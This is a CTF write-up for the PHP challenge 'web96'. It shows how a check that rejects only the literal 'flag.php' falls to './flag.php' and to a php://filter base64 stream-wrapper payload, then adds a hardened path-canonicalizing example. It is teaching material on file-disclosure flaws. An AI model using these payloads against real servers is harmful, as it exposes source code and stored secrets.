web96 notes (file read, parameter must not equal flag.php)

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 19:21:24
# @link: https://ctfer.com

*/


highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }


}

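The script reads whatever file the u parameter names and refuses only when the parameter is exactly flag.php, so simply prefixing ./ is enough. There are several ways to do it; a PHP pseudo-protocol (stream wrapper) works too.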

?u=./flag.php

All that is required is u != flag.php.
Of course, a PHP pseudo-protocol can be used as well:
?u=php://filter/read=convert.base64-encode/resource=flag.php
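
The check above compares the raw parameter, while highlight_file() acts on whatever path that parameter resolves to. The following is an added example (not part of the original challenge or post) of a check that canonicalizes before comparing; the function names, the scratch directory and its file contents are constructed for illustration.

```php
<?php
// Added example; function names and the temp-dir layout are hypothetical.

// The challenge's check: compares the raw parameter to one literal string.
function original_check(string $u): bool
{
    return $u != 'flag.php';            // true = request is served
}

// Hardened check: returns the canonical path to display, or null to refuse.
function resolve_viewable(string $baseDir, string $u, array $denied): ?string
{
    // Refuse stream wrappers (scheme://...) and NUL bytes before any file access.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $u) || strpos($u, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    // realpath() collapses ./, ../, repeated slashes and symlinks.
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $u);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // The canonical path must still be inside the base directory.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Compare the canonical file name, never the raw input.
    if (in_array(strtolower(basename($real)), $denied, true)) {
        return null;
    }
    return $real;
}

// Constructed fixture: a scratch directory with two files.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'web96_demo_' . getmypid();
@mkdir($dir);
file_put_contents("$dir/flag.php", "<?php // constructed placeholder\n");
file_put_contents("$dir/index.php", "<?php // constructed placeholder\n");

$inputs = ['flag.php', './flag.php', 'index.php',
           'php://filter/read=convert.base64-encode/resource=flag.php'];
foreach ($inputs as $u) {
    printf("%-60s original=%-7s hardened=%s\n", $u,
        original_check($u) ? 'served' : 'refused',
        resolve_viewable($dir, $u, ['flag.php']) !== null ? 'served' : 'refused');
}
array_map('unlink', glob("$dir/*"));
rmdir($dir);
```

An explicit allowlist of viewable files is stricter than the denylist used here and is preferable when the set of files is known in advance.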
 
 
posted @ 2025-03-18 11:14  justdoIT*